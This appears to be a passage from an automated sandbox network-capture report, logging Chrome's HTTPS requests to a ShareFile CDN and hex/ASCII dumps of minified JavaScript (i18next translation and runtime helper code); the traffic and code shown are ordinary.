                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 64 28 74 29 2b 22 20 69 73 20 6e 6f 74 20 69 74 65 72 61 62 6c 65 22 29 7d 72 65 74 75 72 6e 20 77 2e 70 72 6f 74 6f 74 79 70 65 3d 78 2c 6f 28 6a 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 2c 7b 76 61 6c 75 65 3a 78 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 6f 28 78 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 2c 7b 76 61 6c 75 65 3a 77 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 77 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 75 28 78 2c 63 2c 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 29 2c 74 2e 69 73 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26
                                                                                                                                                                                                                      Data Ascii: w new TypeError(d(t)+" is not iterable")}return w.prototype=x,o(j,"constructor",{value:x,configurable:!0}),o(x,"constructor",{value:w,configurable:!0}),w.displayName=u(x,c,"GeneratorFunction"),t.isGeneratorFunction=function(e){var t="function"==typeof e&&
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC14808INData Raw: 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3f 53 79 6d 62 6f 6c 3a 7b 7d 2c 75 3d 63 2e 69 74 65 72 61 74 6f 72 7c 7c 22 40 40 69 74 65 72 61 74 6f 72 22 2c 6c 3d 63 2e 61 73 79 6e 63 49 74 65 72 61 74 6f 72 7c 7c 22 40 40 61 73 79 6e 63 49 74 65 72 61 74 6f 72 22 2c 66 3d 63 2e 74 6f 53 74 72 69 6e 67 54 61 67 7c 7c 22 40 40 74 6f 53 74 72 69 6e 67 54 61 67 22 3b 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 2c 65 5b 74 5d 7d 74 72 79 7b 70 28 7b 7d 2c 22 22 29 7d 63 61 74 63 68 28
                                                                                                                                                                                                                      Data Ascii: ion"==typeof Symbol?Symbol:{},u=c.iterator||"@@iterator",l=c.asyncIterator||"@@asyncIterator",f=c.toStringTag||"@@toStringTag";function p(e,t,n){return Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}),e[t]}try{p({},"")}catch(
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC439INData Raw: 2e 6c 65 6e 67 74 68 2c 74 3d 6e 65 77 20 41 72 72 61 79 28 65 29 2c 6e 3d 30 3b 6e 3c 65 3b 6e 2b 2b 29 74 5b 6e 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 66 6f 72 77 61 72 64 28 74 2c 22 77 61 72 6e 22 2c 22 22 2c 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 65 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 74 3d 6e 65 77 20 41 72 72 61 79 28 65 29 2c 6e 3d 30 3b 6e 3c 65 3b 6e 2b 2b 29 74 5b 6e 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 66 6f 72 77 61 72 64 28 74 2c 22 65 72 72 6f 72 22 2c 22 22 29 7d 7d 2c 7b 6b 65 79 3a 22 64 65 70 72 65 63 61 74 65 22 2c 76 61 6c 75 65 3a 66 75 6e
                                                                                                                                                                                                                      Data Ascii: .length,t=new Array(e),n=0;n<e;n++)t[n]=arguments[n];return this.forward(t,"warn","",!0)}},{key:"error",value:function(){for(var e=arguments.length,t=new Array(e),n=0;n<e;n++)t[n]=arguments[n];return this.forward(t,"error","")}},{key:"deprecate",value:fun
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 72 26 26 21 74 68 69 73 2e 64 65 62 75 67 3f 6e 75 6c 6c 3a 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 5b 30 5d 26 26 28 65 5b 30 5d 3d 22 22 2e 63 6f 6e 63 61 74 28 6e 29 2e 63 6f 6e 63 61 74 28 74 68 69 73 2e 70 72 65 66 69 78 2c 22 20 22 29 2e 63 6f 6e 63 61 74 28 65 5b 30 5d 29 29 2c 74 68 69 73 2e 6c 6f 67 67 65 72 5b 74 5d 28 65 29 29 7d 7d 2c 7b 6b 65 79 3a 22 63 72 65 61 74 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 65 28 74 68 69 73 2e 6c 6f 67 67 65 72 2c 76 28 76 28 7b 7d 2c 7b 70 72 65 66 69 78 3a 22 22 2e 63 6f 6e 63 61 74 28 74 68 69 73 2e 70 72 65 66 69 78 2c 22 3a 22 29 2e 63 6f 6e 63 61 74 28 74 2c 22 3a 22 29 7d 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 29 29 7d 7d 2c 7b
                                                                                                                                                                                                                      Data Ascii: r&&!this.debug?null:("string"==typeof e[0]&&(e[0]="".concat(n).concat(this.prefix," ").concat(e[0])),this.logger[t](e))}},{key:"create",value:function(t){return new e(this.logger,v(v({},{prefix:"".concat(this.prefix,":").concat(t,":")}),this.options))}},{
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 7d 7d 66 6f 72 28 3b 69 3d 63 2e 70 6f 70 28 29 3b 29 61 2e 69 73 56 61 6c 69 64 4c 6f 6f 6b 75 70 28 74 29 7c 7c 28 72 3d 69 2c 74 3d 61 2e 67 65 74 52 65 73 6f 75 72 63 65 28 6e 2c 65 2c 69 2c 73 29 29 7d 7d 29 29 29 7d 29 29 7d 7d 29 29 2c 7b 72 65 73 3a 74 2c 75 73 65 64 4b 65 79 3a 6e 2c 65 78 61 63 74 55 73 65 64 4b 65 79 3a 72 2c 75 73 65 64 4c 6e 67 3a 6f 2c 75 73 65 64 4e 53 3a 69 7d 7d 7d 2c 7b 6b 65 79 3a 22 69 73 56 61 6c 69 64 4c 6f 6f 6b 75 70 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 28 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 4e 75 6c 6c 26 26 6e 75 6c 6c 3d 3d 3d 65 7c 7c 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 45 6d 70 74 79
                                                                                                                                                                                                                      Data Ascii: }}for(;i=c.pop();)a.isValidLookup(t)||(r=i,t=a.getResource(n,e,i,s))}})))}))}})),{res:t,usedKey:n,exactUsedKey:r,usedLng:o,usedNS:i}}},{key:"isValidLookup",value:function(e){return!(void 0===e||!this.options.returnNull&&null===e||!this.options.returnEmpty
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 6e 2e 66 6f 72 6d 61 74 28 65 29 7d 7d 29 29 7d 2c 74 68 69 73 2e 69 6e 69 74 28 74 29 7d 72 65 74 75 72 6e 28 30 2c 69 2e 41 29 28 65 2c 5b 7b 6b 65 79 3a 22 69 6e 69 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 3a 7b 7d 7d 29 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 3b 74 68 69 73 2e 66 6f 72 6d 61 74 53 65 70 61 72 61 74 6f 72 3d 74 2e 66 6f 72 6d 61 74 53 65 70 61 72 61 74 6f 72 3f 74 2e 66 6f 72 6d 61 74 53 65 70 61 72 61 74 6f 72 3a 74 2e 66 6f 72 6d 61 74 53 65 70 61 72 61 74 6f 72 7c 7c 22 2c 22 7d 7d 2c
                                                                                                                                                                                                                      Data Ascii: n.format(e)}}))},this.init(t)}return(0,i.A)(e,[{key:"init",value:function(e){var t=(arguments.length>1&&void 0!==arguments[1]?arguments[1]:{interpolation:{}}).interpolation;this.formatSeparator=t.formatSeparator?t.formatSeparator:t.formatSeparator||","}},
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC10797INData Raw: 3d 3d 74 79 70 65 6f 66 20 65 3f 69 2e 6c 6e 67 3d 65 3a 69 2e 6c 6e 67 73 3d 65 2c 69 2e 6e 73 3d 74 2c 69 2e 6b 65 79 50 72 65 66 69 78 3d 6e 2c 69 7d 7d 2c 7b 6b 65 79 3a 22 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 74 72 61 6e 73 6c 61 74 6f 72 26 26 28 65 3d 74 68 69 73 2e 74 72 61 6e 73 6c 61 74 6f 72 29 2e 74 72 61 6e 73 6c 61 74 65 2e 61 70 70 6c 79 28 65 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 7b 6b 65 79 3a 22 65 78 69 73 74 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 74 72 61 6e 73 6c 61 74 6f 72 26 26 28 65 3d 74 68 69 73 2e 74 72 61 6e 73 6c 61 74 6f 72 29 2e 65 78 69 73 74 73 2e 61 70 70 6c 79 28 65
                                                                                                                                                                                                                      Data Ascii: ==typeof e?i.lng=e:i.lngs=e,i.ns=t,i.keyPrefix=n,i}},{key:"t",value:function(){var e;return this.translator&&(e=this.translator).translate.apply(e,arguments)}},{key:"exists",value:function(){var e;return this.translator&&(e=this.translator).exists.apply(e


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      120192.168.2.174984113.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC577OUTGET /sharefile-web/sharefiledev-view-engine-pilet/1.24.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 10:55:24 GMT
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 00:52:04 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 ec5c4a66c1200ddcc562c6e98f77a48c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: 2T8Utg44oRjaDQxGM6x5LXBeWB1UUaKlbQonX0mdz9lG3qWRdy0VEA==
                                                                                                                                                                                                                      Age: 31258
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      121192.168.2.174984313.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC581OUTGET /sharefile-web/sharefiledev-task-aggregator-pilet/1.0.23/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 10:55:24 GMT
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 01:04:00 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 23776effa8a63b2e2dccd702e73b0c86.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: zITryPGK0UpCglYtgK6rTEWqXmzyXK0SOA8Dszjbh2tZ-5rfULm7cQ==
                                                                                                                                                                                                                      Age: 31258
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      122192.168.2.174983913.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC579OUTGET /sharefile-web/sharefiledev-storage-plugin-pilet/1.2.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 10:55:24 GMT
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 10:53:15 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 8a5da1dacdf44356dd0f5d8a61106c9a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: efRsfSl0o0Kl8YHrKzn-XdYK-lRQAdsKSjSOdFX-gN_JClnT2v9ufw==
                                                                                                                                                                                                                      Age: 31259
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      123192.168.2.174984013.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC425OUTGET /sharefile-web/sharefiledev-storage-plugin-pilet/1.2.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 131500
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 10:53:15 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:22 GMT
                                                                                                                                                                                                                      ETag: "275af639a62e1f77ea95fd60b6ea5296"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 c379418fd6100691807f32f274ebe9ce.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: vk88yeuYpARaS1XcAF34pE5RmYmjGi7DgWfldZVQh1k6NhWpzfwiIA==
                                                                                                                                                                                                                      Age: 3
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC15862INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 73 74 6f 72 61 67 65 70 6c 75 67 69 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevstoragepluginpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={},u={};return Object.define
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 72 65 74 75 72 6e 4f 62 6a 65 63 74 73 29 7b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 65 64 4f 62 6a 65 63 74 48 61 6e 64 6c 65 72 7c 7c 74 68 69 73 2e 6c 6f 67 67 65 72 2e 77 61 72 6e 28 22 61 63 63 65 73 73 69 6e 67 20 61 6e 20 6f 62 6a 65 63 74 20 2d 20 62 75 74 20 72 65 74 75 72 6e 4f 62 6a 65 63 74 73 20 6f 70 74 69 6f 6e 73 20 69 73 20 6e 6f 74 20 65 6e 61 62 6c 65 64 21 22 29 3b 76 61 72 20 53 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 65 64 4f 62 6a 65 63 74 48 61 6e 64 6c 65 72 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 65 64 4f 62 6a 65 63 74 48 61 6e 64 6c 65 72 28 6d 2c 79 2c 7a 28 7a 28 7b 7d 2c 74 29 2c 7b 7d 2c 7b 6e 73 3a 6c 7d 29 29 3a 22 6b 65 79 20 27 22 2e 63 6f 6e 63 61 74 28 63 2c 22
                                                                                                                                                                                                                      Data Ascii: returnObjects){this.options.returnedObjectHandler||this.logger.warn("accessing an object - but returnObjects options is not enabled!");var S=this.options.returnedObjectHandler?this.options.returnedObjectHandler(m,y,z(z({},t),{},{ns:l})):"key '".concat(c,"
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 22 3a 74 2e 75 6e 65 73 63 61 70 65 50 72 65 66 69 78 7c 7c 22 2d 22 2c 74 68 69 73 2e 75 6e 65 73 63 61 70 65 53 75 66 66 69 78 3d 74 68 69 73 2e 75 6e 65 73 63 61 70 65 50 72 65 66 69 78 3f 22 22 3a 74 2e 75 6e 65 73 63 61 70 65 53 75 66 66 69 78 7c 7c 22 22 2c 74 68 69 73 2e 6e 65 73 74 69 6e 67 50 72 65 66 69 78 3d 74 2e 6e 65 73 74 69 6e 67 50 72 65 66 69 78 3f 43 28 74 2e 6e 65 73 74 69 6e 67 50 72 65 66 69 78 29 3a 74 2e 6e 65 73 74 69 6e 67 50 72 65 66 69 78 45 73 63 61 70 65 64 7c 7c 43 28 22 24 74 28 22 29 2c 74 68 69 73 2e 6e 65 73 74 69 6e 67 53 75 66 66 69 78 3d 74 2e 6e 65 73 74 69 6e 67 53 75 66 66 69 78 3f 43 28 74 2e 6e 65 73 74 69 6e 67 53 75 66 66 69 78 29 3a 74 2e 6e 65 73 74 69 6e 67 53 75 66 66 69 78 45 73 63 61 70 65 64 7c 7c 43 28
                                                                                                                                                                                                                      Data Ascii: ":t.unescapePrefix||"-",this.unescapeSuffix=this.unescapePrefix?"":t.unescapeSuffix||"",this.nestingPrefix=t.nestingPrefix?C(t.nestingPrefix):t.nestingPrefixEscaped||C("$t("),this.nestingSuffix=t.nestingSuffix?C(t.nestingSuffix):t.nestingSuffixEscaped||C(
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 29 2c 21 61 7c 7c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 66 6f 72 6d 61 74 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 66 6f 72 6d 61 74 21 3d 3d 72 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 66 6f 72 6d 61 74 7c 7c 28 75 2e 66 6f 72 6d 61 74 74 65 72 3d 6f 28 61 29 2c 75 2e 66 6f 72 6d 61 74 74 65 72 2e 69 6e 69 74 28 75 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 66 6f 72 6d 61 74 3d 75 2e 66 6f 72 6d 61 74 74 65 72 2e 66 6f 72 6d 61 74 2e 62 69 6e 64 28 75 2e 66 6f 72 6d 61 74 74 65 72 29 29 2c 75 2e 69 6e 74 65 72 70 6f 6c 61 74 6f 72 3d 6e 65 77 20 74 65 28 74 68 69 73 2e 6f 70 74 69
                                                                                                                                                                                                                      Data Ascii: ),!a||this.options.interpolation.format&&this.options.interpolation.format!==r.interpolation.format||(u.formatter=o(a),u.formatter.init(u,this.options),this.options.interpolation.format=u.formatter.format.bind(u.formatter)),u.interpolator=new te(this.opti
                                                                                                                                                                                                                      2024-11-05 19:36:23 UTC16384INData Raw: 7d 28 7b 7d 2c 65 2e 70 72 6f 70 73 2c 7b 5f 5f 70 6f 73 69 74 69 6f 6e 3a 74 7d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4e 65 28 65 2c 74 29 7b 69 66 28 21 65 2e 24 24 74 79 70 65 6f 66 7c 7c 21 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 63 6c 6f 6e 65 28 29 20 72 65 71 75 69 72 65 73 20 61 6e 20 65 6c 65 6d 65 6e 74 20 61 6e 64 20 6b 65 79 22 29 3b 76 61 72 20 6e 3d 65 2e 70 72 6f 70 73 2c 72 3d 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 62 65 5b 22 64 65 66 61 75 6c 74 22 5d 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 72 2c 53 65 28 7b 7d 2c 6e 2c 7b 6b 65 79 3a 74 7d 29 2c 6e 2e 63 68 69 6c 64 72 65 6e 29 7d 76 61 72 20 41 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 74 3d 61 72 67 75 6d 65 6e
                                                                                                                                                                                                                      Data Ascii: }({},e.props,{__position:t})))}function Ne(e,t){if(!e.$$typeof||!t)throw new Error("clone() requires an element and key");var n=e.props,r=e.type;return be["default"].createElement(r,Se({},n,{key:t}),n.children)}var Ae=function(){function e(){var t=argumen
                                                                                                                                                                                                                      2024-11-05 19:36:23 UTC16384INData Raw: 65 73 2e 6c 65 6e 67 74 68 2d 31 3b 6e 3e 3d 30 3b 2d 2d 6e 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 5b 6e 5d 3b 69 66 28 72 2e 74 72 79 4c 6f 63 3c 3d 74 68 69 73 2e 70 72 65 76 26 26 61 2e 63 61 6c 6c 28 72 2c 22 66 69 6e 61 6c 6c 79 4c 6f 63 22 29 26 26 74 68 69 73 2e 70 72 65 76 3c 72 2e 66 69 6e 61 6c 6c 79 4c 6f 63 29 7b 76 61 72 20 6f 3d 72 3b 62 72 65 61 6b 7d 7d 6f 26 26 28 22 62 72 65 61 6b 22 3d 3d 3d 65 7c 7c 22 63 6f 6e 74 69 6e 75 65 22 3d 3d 3d 65 29 26 26 6f 2e 74 72 79 4c 6f 63 3c 3d 74 26 26 74 3c 3d 6f 2e 66 69 6e 61 6c 6c 79 4c 6f 63 26 26 28 6f 3d 6e 75 6c 6c 29 3b 76 61 72 20 69 3d 6f 3f 6f 2e 63 6f 6d 70 6c 65 74 69 6f 6e 3a 7b 7d 3b 72 65 74 75 72 6e 20 69 2e 74 79 70 65 3d 65 2c 69 2e 61 72 67 3d 74 2c
